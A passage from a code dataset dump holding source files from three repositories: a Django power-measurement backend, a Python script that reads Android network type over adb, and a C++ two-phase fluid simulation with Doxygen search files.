"alphanum_fraction": 0.7011070251464844,
"avg_line_length": 26.100000381469727,
"blob_id": "c193f72ddc354791a528175ebcab36496ab00aee",
"content_id": "1220dcd77b43c37131ec2f9b484574bdc879ee0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 10,
"path": "/datapoints/tests.py",
"repo_name": "ryanrabello/power-analyzer-backend",
"src_encoding": "UTF-8",
"text": "from django.test import TestCase, Client\nfrom django.urls import reverse\n\n\nclass GenericTest(TestCase):\n\n def test_did_compile(self):\n client = Client()\n response = client.get(reverse('datapoints:index'))\n self.assertIs(response.status_code, 200)\n"
},
{
"alpha_fraction": 0.822429895401001,
"alphanum_fraction": 0.822429895401001,
"avg_line_length": 25.75,
"blob_id": "71ba39f440a2ff1ef127bfb25ff39e8ee0011470",
"content_id": "c3b8618097bbf406a280fe9ab99c953b5a499ed7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 214,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 8,
"path": "/datapoints/admin.py",
"repo_name": "ryanrabello/power-analyzer-backend",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\nfrom .models import Building, Device, Circuit, Measurement\n\nadmin.site.register(Building)\nadmin.site.register(Device)\nadmin.site.register(Circuit)\nadmin.site.register(Measurement)\n"
},
{
"alpha_fraction": 0.6705461144447327,
"alphanum_fraction": 0.6920322179794312,
"avg_line_length": 27.64102554321289,
"blob_id": "32c7f2a981ccc876b1d08f589329c07d9ca0e6e9",
"content_id": "6978e8db03c8c2410ee3be38754f73e990ef05f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1117,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 39,
"path": "/datapoints/models.py",
"repo_name": "ryanrabello/power-analyzer-backend",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\nclass Building(models.Model):\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=1000)\n\n def __str__(self):\n return self.name\n\n\nclass Device(models.Model):\n building = models.ForeignKey(Building, on_delete=models.CASCADE)\n name = models.CharField(max_length=200)\n location = models.CharField(max_length=200)\n description = models.CharField(max_length=1000)\n\n def __str__(self):\n return self.name\n\n\nclass Circuit(models.Model):\n device = models.ForeignKey(Device, on_delete=models.CASCADE)\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=1000)\n\n def __str__(self):\n return self.name\n\n\nclass Measurement(models.Model):\n Circuit = models.ForeignKey(Circuit, on_delete=models.CASCADE)\n # Note: If we choose to allow the device to set the time of measurement\n # this will have to be changed to a value that can be set.\n time = models.DateTimeField(auto_now_add=True)\n power = models.FloatField()\n\n def __str__(self):\n return str(self.time)\n"
}
] | 3 |
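A minimal sketch of exercising the model chain defined in `models.py` above from a Django shell. The model and field names come from the entry; the literal values are illustrative, and this assumes the `datapoints` app is in `INSTALLED_APPS` with migrations applied:

```python
from datapoints.models import Building, Device, Circuit, Measurement

# Build one row at each level of the Building -> Device -> Circuit chain.
b = Building.objects.create(name="Science Hall", description="example building")
d = Device.objects.create(building=b, name="Meter 1", location="Basement",
                          description="example device")
c = Circuit.objects.create(device=d, name="Lighting", description="example circuit")

# `time` is filled automatically by auto_now_add.
m = Measurement.objects.create(circuit=c, power=412.5)
print(m.circuit.device.building.name)  # -> "Science Hall"
```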
karmaisgreat/Adb-Network-Type-Detector | https://github.com/karmaisgreat/Adb-Network-Type-Detector | 9064cb988b760462004836d6d5eb53f80eec3ed5 | c2a89824654852d44768c102d5e28214b9e4bd07 | a1ca9a8e760e0ed3a70abf40c9833c087c4c2391 | refs/heads/master | 2020-12-08T05:30:27.366467 | 2020-01-09T20:35:40 | 2020-01-09T20:35:40 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7840909361839294,
"alphanum_fraction": 0.7840909361839294,
"avg_line_length": 28.33333396911621,
"blob_id": "0e068e8633e286a666c52ae52759ba2727a4f963",
"content_id": "a510da0283d8b3837408e06b0fde3a2e127fff18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 88,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 3,
"path": "/README.md",
"repo_name": "karmaisgreat/Adb-Network-Type-Detector",
"src_encoding": "UTF-8",
"text": "# adb-network-type-detector\n\nPreferred Network Type Detector build for adb in python...\n"
},
{
"alpha_fraction": 0.5742574334144592,
"alphanum_fraction": 0.5884631872177124,
"avg_line_length": 40.5,
"blob_id": "78e773c24afde950f65e667ff2ea9c3e5d737101",
"content_id": "1feccd450163c33b7d2c896f60cee488873bc31b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2323,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 56,
"path": "/network_detection.py",
"repo_name": "karmaisgreat/Adb-Network-Type-Detector",
"src_encoding": "UTF-8",
"text": "import os,platform,time\ndetected_os = platform.system()\nif 'Windows' in detected_os:\n print('\\nWindows OS Detected!\\n')\n while True:\n cmd0 = \"platform-tools_r29.0.5-windows\\\\adb.exe shell dumpsys telephony.registry > logging.txt\"\n os.system(cmd0)\n fin = open('logging.txt', \"r\")\n data_list = fin.readlines()\n fin.close()\n fout = open(\"logging.txt\", \"w\")\n fout.writelines(data_list[:5])\n fout.close()\n if 'mRilDataRadioTechnology=2(EDGE)' in open('logging.txt').read():\n print('EDGE DETECTED!')\n elif 'mRilDataRadioTechnology=3(UMTS)' in open('logging.txt').read():\n print('UMTS DETECTED!')\n elif 'mRilDataRadioTechnology=9(HSDPA)' in open('logging.txt').read():\n print('HSDPA DETECTED!')\n elif 'mRilDataRadioTechnology=11(HSPA)' in open('logging.txt').read():\n print('HSPA DETECTED!')\n elif 'mRilDataRadioTechnology=15(HSPAP)' in open('logging.txt').read():\n print('HSPAP DETECTED!')\n elif 'mRilDataRadioTechnology=14(LTE)' in open('logging.txt').read():\n print('LTE DETECTED!')\n else:\n print('UNKNOWN NETWORK!')\n time.sleep(2)\n \nelif 'Linux' in detected_os:\n print('\\nLinux OS Detected!\\n')\n while True:\n cmd0 = \"platform-tools_r29.0.5-linux\\\\adb dumpsys telephony.registry > logging.txt\"\n os.system(cmd0)\n fin = open('logging.txt', \"r\")\n data_list = fin.readlines()\n fin.close()\n fout = open(\"logging.txt\", \"w\")\n fout.writelines(data_list[:5])\n fout.close()\n if 'mRilDataRadioTechnology=2(EDGE)' in open('logging.txt').read():\n print('EDGE DETECTED!')\n elif 'mRilDataRadioTechnology=3(UMTS)' in open('logging.txt').read():\n print('UMTS DETECTED!')\n elif 'mRilDataRadioTechnology=11(HSPA)' in open('logging.txt').read():\n print('HSPA DETECTED!')\n elif 'mRilDataRadioTechnology=15(HSPAP)' in open('logging.txt').read():\n print('HSPAP DETECTED!')\n elif 'mRilDataRadioTechnology=14(LTE)' in open('logging.txt').read():\n print('LTE DETECTED!')\n else:\n print('UNKNOWN NETWORK!')\n time.sleep(2)\nelse:\n print('\\nUnknown OS Detected!\\n')\n exit()"
}
] | 2 |
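Instead of one substring check per technology, the `mRilDataRadioTechnology=<code>(<NAME>)` token the script greps for can be parsed once with a regex. A minimal sketch over a canned `dumpsys` fragment — the field name matches the script above; the sample line is made up:

```python
import re

# One line of the kind `adb shell dumpsys telephony.registry` produces.
sample = "mServiceState=... mRilDataRadioTechnology=14(LTE) ..."

match = re.search(r"mRilDataRadioTechnology=(\d+)\(([A-Z]+)\)", sample)
if match:
    code, name = match.groups()
    print(name + " DETECTED! (code " + code + ")")
else:
    print("UNKNOWN NETWORK!")
```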
bpatmiller/gfm2d | https://github.com/bpatmiller/gfm2d | 04e2c4985b959acf3070ba1d6e86ebeee0a10854 | 5495150b94ca91e0a88817c9ffc1e78e7b159b3b | d02288382d8edf693a665f559fbe709970f1b272 | refs/heads/master | 2020-07-04T18:23:23.994721 | 2019-08-27T06:10:29 | 2019-08-27T06:10:29 | 202,371,355 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5247285962104797,
"alphanum_fraction": 0.5934861302375793,
"avg_line_length": 39.1129035949707,
"blob_id": "34fe3009b3dcccdebe00057b93a7e1084e8098db",
"content_id": "30bbfec94564ab161996b20210b1a3e9d18081d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2487,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 62,
"path": "/lib/calculus.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"velocityfield.hpp\"\nusing namespace glm;\n\n/** Note: this is intended for use with only integer indices */\nvec2 upwind_gradient(Array2f &phi, vec2 velocity, vec2 ij) {\n if (ij.x < 1.0 || ij.x > phi.sx - 2.0 || ij.y < 0 || ij.y > phi.sy - 2.0)\n return vec2(0);\n float dx = velocity.x > 0 ? phi(ij) - phi(ij - vec2(1, 0))\n : phi(ij + vec2(1, 0)) - phi(ij);\n float dy = velocity.y > 0 ? phi(ij) - phi(ij - vec2(0, 1))\n : phi(ij + vec2(0, 1)) - phi(ij);\n return vec2(dx, dy) / phi.h;\n}\n\n/** \"Classic\" 4th order Runge-Kutta integration */\nvec2 rk4(vec2 position, VelocityField &vel, float dt) {\n float l1 = vel(position).x * dt;\n float l2 = dt * vel(vec2(position.x + 0.5f * l1, position.y + 0.5f * dt)).x;\n float l3 = dt * vel(vec2(position.x + 0.5f * l2, position.y + 0.5f * dt)).x;\n float l4 = dt * vel(vec2(position.x + l3, position.y * dt)).x;\n float x = position.x + (1.f / 6.f) * (l1 + 2.f * l2 + 2.f * l3 + l4);\n\n float k1 = vel(position).y * dt;\n float k2 = dt * vel(vec2(position.x + 0.5f * dt, position.y + 0.5f * k1)).y;\n float k3 = dt * vel(vec2(position.x + 0.5f * dt, position.y + 0.5f * k2)).y;\n float k4 = dt * vel(vec2(position.x * dt, position.y + k3)).y;\n float y = position.y + (1.f / 6.f) * (k1 + 2.f * k2 + 2.f * k3 + k4);\n\n return vec2(x, y);\n}\n\n/** Forward euler integration, only for testing purposes */\nvec2 forward_euler(vec2 position, VelocityField &vel, float dt) {\n return position + (vel(position) * dt);\n}\n\n/** returns the central difference gradient of a point on a grid */\nvec2 gradient(Array2f &field, vec2 ij) {\n float dx = field(ij + vec2(1, 0)) - field(ij - vec2(1, 0));\n float dy = field(ij + vec2(0, 1)) - field(ij - vec2(0, 1));\n return vec2(dx, dy) / (2.0f * field.h);\n}\n\nvec2 bilerp(vec2 v00, vec2 v10, vec2 v01, vec2 v11, vec2 xy) {\n return ((1.0f - xy.x) * v00 + xy.x * v10) * (1.0f - xy.y) +\n ((1.0f - xy.x) * v01 + xy.x * v11) * (xy.y);\n}\n\n/** returns the interpolated central differenced gradient of a point in\n * worldspace */\nvec2 interpolate_gradient(Array2f &field, vec2 world_position) {\n vec2 ij = field.coordinates_at(world_position);\n vec2 xy = field.subcell_coordinates(ij);\n\n vec2 g00 = gradient(field, ivec2(ij));\n vec2 g10 = gradient(field, ivec2(ij) + ivec2(1, 0));\n vec2 g01 = gradient(field, ivec2(ij) + ivec2(0, 1));\n vec2 g11 = gradient(field, ivec2(ij) + ivec2(1, 1));\n\n return bilerp(g00, g10, g01, g11, xy);\n}\n"
},
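The `bilerp` helper in the entry above blends four corner values using weights from the fractional cell coordinates. The same formula in a few lines of Python, checked at the corners — the variable names mirror the C++, and the numeric data is illustrative:

```python
def bilerp(v00, v10, v01, v11, x, y):
    # Linear blend along x on both rows, then along y between the rows.
    bottom = (1.0 - x) * v00 + x * v10
    top = (1.0 - x) * v01 + x * v11
    return (1.0 - y) * bottom + y * top

# At the corners the interpolant reproduces the corner values exactly.
assert bilerp(1.0, 2.0, 3.0, 4.0, 0.0, 0.0) == 1.0
assert bilerp(1.0, 2.0, 3.0, 4.0, 1.0, 1.0) == 4.0
print(bilerp(1.0, 2.0, 3.0, 4.0, 0.5, 0.5))  # 2.5
```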
{
"alpha_fraction": 0.4955357015132904,
"alphanum_fraction": 0.7098214030265808,
"avg_line_length": 43.79999923706055,
"blob_id": "1e5225953609c1c5eabd8ca8c7a9fb89273e8ff7",
"content_id": "224dc8458fb20e84499a38d8020931511b0a83f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 224,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 5,
"path": "/docs/search/functions_3.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['ij_5ffrom_5findex',['ij_from_index',['../structArray2.html#a2b28a251ffb9195059a7ec0f2f5dc799',1,'Array2']]],\n ['init',['init',['../structArray2.html#ad6a742ce7bd22f8f56b3959a26f28c11',1,'Array2']]]\n];\n"
},
{
"alpha_fraction": 0.5290697813034058,
"alphanum_fraction": 0.729651153087616,
"avg_line_length": 85,
"blob_id": "7e9155fca7487b401092b9c0901abd88fe4d5187",
"content_id": "550afe8692477efd5be76015443c84acaf207e9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 344,
"license_type": "no_license",
"max_line_length": 322,
"num_lines": 4,
"path": "/docs/search/functions_4.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['operator_28_29',['operator()',['../structArray2.html#ac73bd1d6e74fade6085e8fccdfda8d7f',1,'Array2::operator()(int i)'],['../structArray2.html#a8a89f0623dc0e116e4dc14b0b77b769e',1,'Array2::operator()(int i, int j)'],['../structArray2.html#ab491a0168c532b6670233dec0e7a45d9',1,'Array2::operator()(glm::vec2 const ij)']]]\n];\n"
},
{
"alpha_fraction": 0.5726119875907898,
"alphanum_fraction": 0.5890775322914124,
"avg_line_length": 31.377483367919922,
"blob_id": "d75e48ef74ac2ec577829fe08af5cbb410815df0",
"content_id": "fec5da11260d2ca086b81a39aacbb85aa088a938",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 9778,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 302,
"path": "/lib/simulation.cpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#include \"simulation.hpp\"\n#include \"export_data.hpp\"\n#include \"levelset_methods.hpp\"\n#include \"particle_levelset_method.hpp\"\n#include <eigen3/Eigen/IterativeLinearSolvers>\n#include <eigen3/Eigen/SparseCore>\n\n/** Returns a timestep that ensures the simulation is stable */\nfloat Simulation::cfl() {\n float reciprocal = (u.infnorm() + v.infnorm()) / h;\n return 1.0 / reciprocal;\n}\n\n/** Runs the main simulation loop. Exports simulation data at each timestep,\n * and breaks the timestep into substeps based on the CFL condition\n * time_elapsed - current runtime of the simulation\n * max_t - total amount of time the simulation will run\n * timestep - amount of time between \"frames\"\n * t - tracks the amount of time traversed in a given frame\n * substep - a length of time given by cfl() */\nvoid Simulation::run() {\n auto start_time = std::chrono::high_resolution_clock::now();\n // delete old datafiles, fix after initializing\n clear_exported_data();\n for (auto &f : fluids) {\n reinitialize_phi(f);\n }\n project_phi(fluids, solid_phi, vec4(-1, -1, -1, 0.0));\n // advance(std::min(cfl(), 1e-7f));\n print_information();\n auto end_time = std::chrono::high_resolution_clock::now();\n auto duration = std::chrono::duration_cast<std::chrono::milliseconds>(\n end_time - start_time);\n float ms = duration.count();\n printf(\"[ %.2fs elapsed ] \", ms / 1000.f);\n export_simulation_data(p, vel, fluids, time_elapsed, frame_number);\n while (time_elapsed < max_t) {\n frame_number += 1;\n if (time_elapsed + timestep > max_t)\n timestep = max_t - time_elapsed;\n // break the timestep up\n float t = 0;\n while (t < timestep) {\n float substep = cfl();\n if (t + substep > timestep)\n substep = timestep - t;\n advance(substep);\n t += substep;\n /* progress bar code */\n std::cout << \" \";\n int pos = 20 * (t / timestep);\n for (int b = 0; b < 20; ++b) {\n if (b < pos)\n std::cout << \".\";\n else if (b == pos)\n std::cout << \">\";\n else\n std::cout << \" \";\n }\n std::cout << \" \" << int((t / timestep) * 100.f) << \"%\\r\";\n std::cout.flush();\n /* ^ consider refactoring this */\n }\n std::cout << \"\\r\";\n std::cout.flush();\n end_time = std::chrono::high_resolution_clock::now();\n duration = std::chrono::duration_cast<std::chrono::milliseconds>(\n end_time - start_time);\n ms = duration.count();\n time_elapsed += timestep;\n printf(\"[ %3.2fs elapsed ] \", ms / 1000.f);\n export_simulation_data(p, vel, fluids, time_elapsed, frame_number);\n }\n for (auto f : fluids) {\n f.print_information();\n }\n}\n\n/* The central method in the Simulation class. This performs all of our\n * computations for a given timestep that it assumed to be safe. 
*/\nvoid Simulation::advance(float dt) {\n assert(dt > 0);\n for (auto &f : fluids) {\n advect_phi(u, v, f.phi, dt);\n advect_particles(f, vel, solid_phi, dt);\n correct_levelset(f);\n reinitialize_phi(f);\n correct_levelset(f);\n adjust_particle_radii(f);\n if (reseed_counter++ % 5 == 0)\n reseed_particles(f, solid_phi);\n }\n project_phi(fluids, solid_phi, rxn);\n\n advect_velocity(dt);\n add_gravity(dt);\n\n // float max_velocity = 200.f;\n // u.clamp(-max_velocity, max_velocity);\n // v.clamp(-max_velocity, max_velocity);\n enforce_boundaries();\n solve_pressure(dt);\n apply_pressure_gradient(dt);\n}\n\nvoid Simulation::get_fluid_ids() {\n Array2f min_phi(sx, sy, -0.5, -0.5, h);\n min_phi.set(99999.9);\n\n for (uint n = 0; n < fluids.size(); n++) {\n auto &f = fluids[n];\n for (auto it = fluid_id.begin(); it != fluid_id.end(); it++) {\n vec2 ij = it.ij();\n if (f.phi(ij) < min_phi(ij)) {\n min_phi(ij) = f.phi(ij);\n fluid_id(ij) = n;\n }\n }\n }\n}\n\nvoid Simulation::add_gravity(float dt) {\n for (auto &face : v.data) {\n face -= 9.8 * dt;\n }\n}\n\nvoid Simulation::advect_velocity(float dt) {\n Array2f new_u(u);\n Array2f new_v(v);\n\n for (auto it = new_u.begin(); it != new_u.end(); it++) {\n vec2 new_position = rk4(it.wp(), vel, -dt);\n *it = u.value_at(new_position);\n }\n\n for (auto it = new_v.begin(); it != new_v.end(); it++) {\n vec2 new_position = rk4(it.wp(), vel, -dt);\n *it = v.value_at(new_position);\n }\n\n u = new_u;\n v = new_v;\n}\n\n/** Sets the velocity on solid boundaries to 0 so that fluids do not flow in or\n * out of solids */\nvoid Simulation::enforce_boundaries() {\n for (auto it = solid_phi.begin(); it != solid_phi.end(); it++) {\n if (*it < 0) {\n vec2 ij = it.ij();\n for (auto &f : fluids) {\n f.phi(ij) = min(f.phi(ij), 0.5f * f.phi.h);\n }\n u(ij) = 0;\n u(ij + vec2(1, 0)) = 0;\n v(ij) = 0;\n v(ij + vec2(0, 1)) = 0;\n }\n }\n}\n\n/* Returns an int array which gives each fluid cell a corresponding nonnegative\n * integer index. Nonfluid cells are marked with a -1 */\nArray2i Simulation::count_fluid_cells() {\n Array2i fluid_cell_count(sx, sy, -0.5, -0.5, h);\n fluid_cell_count.set(-1);\n int counter = 0;\n for (int i = 0; i < fluid_cell_count.size(); i++) {\n if (solid_phi(i) <= 0)\n continue;\n fluid_cell_count(i) = counter++;\n }\n assert(counter > 0);\n return fluid_cell_count;\n}\n\n/** Returns the density between two voxels, either as naively expected in the\n * case where the voxels contain the same fluid, or as defined in eqn. 55 in Liu\n * et al*/\nfloat Simulation::sample_density(vec2 ij, vec2 kl) {\n if (fluid_id(ij) == fluid_id(kl)) {\n return 1.f / fluids[fluid_id(ij)].density;\n } else {\n int ij_id = fluid_id(ij);\n int kl_id = fluid_id(kl);\n float ij_phi = fluids[ij_id].phi(ij);\n float kl_phi = fluids[kl_id].phi(kl);\n float b_minus = 1.f / fluids[ij_id].density;\n float b_plus = 1.f / fluids[kl_id].density;\n float theta = abs(ij_phi) / (abs(ij_phi) + abs(kl_phi));\n return (b_minus * b_plus) / (theta * b_plus + (1.f - theta) * b_minus);\n }\n}\n\n/** Assembles a varying coefficient matrix for the possion equation. The lhs is\n * discretized as in eqn. 
77 in liu et all */\nEigen::SparseMatrix<double>\nSimulation::assemble_poisson_coefficient_matrix(Array2i fluid_cell_count,\n int nf) {\n std::vector<Eigen::Triplet<double>> coefficients;\n for (int it = 0; it < p.size(); it++) {\n if (solid_phi(it) <= 0)\n continue;\n vec2 ij = p.ij_from_index(it);\n float scale = 1.f / (h * h);\n int center_index = fluid_cell_count(ij);\n float center_coefficient = 0;\n\n /* loop through all four neighboring cells */\n for (auto offset : {vec2(1, 0), vec2(-1, 0), vec2(0, 1), vec2(0, -1)}) {\n vec2 neighbor_position = ij + offset;\n int neighbor_index = fluid_cell_count(neighbor_position);\n if (neighbor_index >= 0) {\n float b_hat = sample_density(ij, neighbor_position);\n float neighbor_coefficient = scale * b_hat;\n center_coefficient -= scale * b_hat;\n coefficients.push_back(Eigen::Triplet<double>(\n center_index, neighbor_index, neighbor_coefficient));\n }\n }\n coefficients.push_back(\n Eigen::Triplet<double>(center_index, center_index, center_coefficient));\n }\n\n Eigen::SparseMatrix<double> A(nf, nf);\n A.setFromTriplets(coefficients.begin(), coefficients.end());\n return A;\n}\n\n/** Sets up a linear system Ax=b to solve the discrete poission equation with\n * varying coefficients.\n */\nvoid Simulation::solve_pressure(float dt) {\n /* Count each fluid cell, and find which voxels contain which fluids */\n get_fluid_ids();\n Array2i fluid_cell_count = count_fluid_cells();\n int nf = fluid_cell_count.max() + 1; // number of fluid cells\n\n /* Compute the discrete divergence of each fluid cell */\n Eigen::VectorXd rhs(nf);\n for (int i = 0; i < solid_phi.size(); i++) {\n if (solid_phi(i) <= 0)\n continue;\n vec2 ij = solid_phi.ij_from_index(i);\n rhs(fluid_cell_count(i)) = (1.f / (h * dt)) * (u(ij + vec2(1, 0)) - u(ij) +\n v(ij + vec2(0, 1)) - v(ij));\n }\n\n /* Assemble the coefficient matrix */\n Eigen::SparseMatrix<double> A =\n assemble_poisson_coefficient_matrix(fluid_cell_count, nf);\n\n /* Copy old pressure to a vector, to use as a guess */\n // Eigen::VectorXd old_pressures(nf);\n // for (int i = 0; i < p.size(); i++) {\n // if (fluid_cell_count(i) < 0)\n // continue;\n // old_pressures(fluid_cell_count(i)) = p(i);\n // }\n\n /* Solve the linear system with the PCG method */\n Eigen::ConjugateGradient<Eigen::SparseMatrix<double>> solver;\n Eigen::VectorXd pressures(nf);\n solver.compute(A);\n // pressures = solver.solveWithGuess(rhs, old_pressures);\n pressures = solver.solve(rhs);\n\n /* Copy the new pressure values over */\n p.clear();\n for (int i = 0; i < p.size(); i++) {\n if (fluid_cell_count(i) < 0)\n continue;\n p(i) = pressures(fluid_cell_count(i));\n }\n}\n\n/** Applies the discrete pressure gradient using a similar method as how the\n * coefficient matrix in solve_pressure is constructed. */\nvoid Simulation::apply_pressure_gradient(float dt) {\n for (auto it = u.begin(); it != u.end(); it++) {\n vec2 ij = it.ij();\n if (ij.x < 1 || ij.x >= u.sx - 1)\n continue;\n if (solid_phi(ij) <= 0 || solid_phi(ij - vec2(1, 0)) <= 0)\n continue;\n float du = sample_density(ij, ij - vec2(1, 0)) * (dt / h) *\n (p(ij) - p(ij - vec2(1, 0)));\n u(ij) -= du;\n }\n\n for (auto it = v.begin(); it != v.end(); it++) {\n vec2 ij = it.ij();\n if (ij.y < 1 || ij.y >= v.sy - 1)\n continue;\n if (solid_phi(ij) <= 0 || solid_phi(ij - vec2(0, 1)) <= 0)\n continue;\n float dv = sample_density(ij, ij - vec2(0, 1)) * (dt / h) *\n (p(ij) - p(ij - vec2(0, 1)));\n v(ij) -= dv;\n }\n}\n"
},
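The substep subdivision in `Simulation::run()` above is easiest to see in isolation. Below is a minimal, self-contained sketch (not repository code; the cell size, frame length, and velocity infinity-norms are assumed example values) showing how the CFL bound and the frame boundary jointly clamp each substep:

```cpp
// Minimal sketch of the substep loop in Simulation::run(). All values are
// illustrative assumptions, not taken from a real run.
#include <algorithm>
#include <cstdio>

// Mirrors Simulation::cfl(): h / (|u|_inf + |v|_inf), i.e. roughly the time
// for the fastest velocity component to cross one grid cell.
float cfl(float u_inf, float v_inf, float h) { return h / (u_inf + v_inf); }

int main() {
  const float h = 0.01f;            // assumed cell size
  const float timestep = 0.25f;     // assumed time between exported frames
  const float u_inf = 1.5f, v_inf = 0.8f; // assumed velocity norms

  float t = 0.f;
  while (t < timestep) {
    // Never step further than the CFL bound, and never overshoot the frame.
    float substep = std::min(cfl(u_inf, v_inf, h), timestep - t);
    // advance(substep) would run here in the real loop.
    t += substep;
    std::printf("advanced %.5fs (%3.0f%% of frame)\n", substep,
                100.f * t / timestep);
  }
  return 0;
}
```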
{
"alpha_fraction": 0.6460176706314087,
"alphanum_fraction": 0.6548672318458557,
"avg_line_length": 11.666666984558105,
"blob_id": "b5958c1a2b4daa80c273707e3be155bae21b7765",
"content_id": "28c048ea4d2a68551e4d82763eff5ab1414f81cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 113,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 9,
"path": "/src/main.cpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#include \"settings.hpp\"\n\nint main() {\n Simulation sim;\n initialize_simulation(sim);\n\n sim.run();\n return 0;\n}"
},
{
"alpha_fraction": 0.5427110195159912,
"alphanum_fraction": 0.561892569065094,
"avg_line_length": 35.21296310424805,
"blob_id": "537ae1612ee4037981c04447c3c1578a65657eac",
"content_id": "b1cdf07bbbce3ce73a3d08d1bb528e0b0b9bda02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3910,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 108,
"path": "/lib/particle_levelset_method.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"calculus.hpp\"\n#include \"simulation.hpp\"\n#include <glm/gtc/random.hpp>\nusing namespace glm;\n\n// TODO remove solid phi\nvoid reseed_particles(Fluid &f, Array2f solid_phi) {\n /* start by removing invalid particles */\n for (auto &p : f.particles) {\n float local_phi = f.phi.value_at(p.position);\n p.valid = (abs(local_phi) < 3.f * f.phi.h);\n }\n f.particles.erase(std::remove_if(f.particles.begin(), f.particles.end(),\n [](Particle const &p) { return !p.valid; }),\n f.particles.end());\n\n /* count particles in voxels */\n f.particle_count.clear();\n for (auto &p : f.particles) {\n vec2 grid_coordinates = f.particle_count.coordinates_at(p.position);\n f.particle_count(grid_coordinates) += 1;\n }\n\n /* seed new particles to non-full voxels */\n for (int i = 0; i < f.phi.size(); i++) {\n // FIXME\n vec2 ij = f.phi.ij_from_index(i);\n if (abs(f.phi(i)) > 3.f * f.phi.h || ij.x < 2 || ij.y < 2 ||\n ij.x > f.phi.sx - 3 || ij.y > f.phi.sy - 3 || solid_phi(i) <= 0)\n continue;\n while (f.particle_count(i) < 16) {\n vec2 position = f.particle_count.wp_from_index(i) +\n linearRand(vec2(0), vec2(f.phi.h));\n float initial_phi = f.phi.value_at(position);\n float goal_phi =\n (initial_phi > 0)\n ? clamp(initial_phi, 0.1f * f.phi.h, 1.0f * f.phi.h)\n : clamp(initial_phi, -1.0f * f.phi.h, -0.1f * f.phi.h);\n vec2 normal = normalize(interpolate_gradient(f.phi, position));\n vec2 new_position = position + (goal_phi - initial_phi) * normal;\n new_position =\n clamp(new_position, 2.001f * f.phi.h,\n (max((float)f.phi.sx, (float)f.phi.sy) - 2.001f) * f.phi.h);\n float new_phi = f.phi.value_at(new_position);\n float radius = clamp(abs(new_phi), 0.1f * f.phi.h, 0.5f * f.phi.h);\n f.particles.push_back(Particle(new_position, new_phi, radius));\n f.particle_count(i) += 1;\n }\n }\n}\n\nvoid adjust_particle_radii(Fluid &f) {\n for (auto &p : f.particles) {\n float local_phi = f.phi.value_at(p.position);\n p.radius = clamp(abs(local_phi), 0.1f * f.phi.h, 0.5f * f.phi.h);\n }\n}\n\n/** Correct a levelset using the particle level set method */\nvoid correct_levelset(Fluid &f) {\n /* Compute phi+ and phi- */\n Array2f phi_minus(f.phi);\n Array2f phi_plus(f.phi);\n for (auto &p : f.particles) {\n float local_phi = f.phi.value_at(p.position);\n if (p.starting_phi * local_phi >= 0 || abs(local_phi) < p.radius)\n continue;\n float sign_p = (p.starting_phi > 0) ? 
1.f : -1.f;\n vec2 grid_position = vec2(ivec2(f.phi.coordinates_at(p.position)));\n for (auto offset : {vec2(0, 0), vec2(1, 0), vec2(0, 1), vec2(1, 1)}) {\n float phi_p =\n sign_p *\n (p.radius -\n distance(p.position, f.phi.worldspace_of(grid_position + offset)));\n if (sign_p > 0) {\n phi_plus(grid_position + offset) =\n max(phi_p, phi_plus(grid_position + offset));\n } else {\n phi_minus(grid_position + offset) =\n min(phi_p, phi_minus(grid_position + offset));\n }\n }\n }\n /* Merge phi+ and phi- */\n for (int i = 0; i < f.phi.size(); i++) {\n if (abs(phi_plus(i)) >= abs(phi_minus(i))) {\n f.phi(i) = phi_minus(i);\n } else {\n f.phi(i) = phi_plus(i);\n }\n }\n}\n\nvoid advect_particles(Fluid &f, VelocityField &vel, Array2f &solid_phi,\n float dt) {\n for (auto &p : f.particles) {\n p.position = rk4(p.position, vel, dt);\n if (solid_phi.value_at(p.position) < 0.0) {\n p.position -= solid_phi.value_at(p.position) *\n interpolate_gradient(solid_phi, p.position);\n }\n p.position.x =\n clamp(p.position.x, solid_phi.h, (solid_phi.sx - 1.f) * solid_phi.h);\n p.position.y =\n clamp(p.position.y, solid_phi.h, (solid_phi.sy - 1.f) * solid_phi.h);\n }\n}"
},
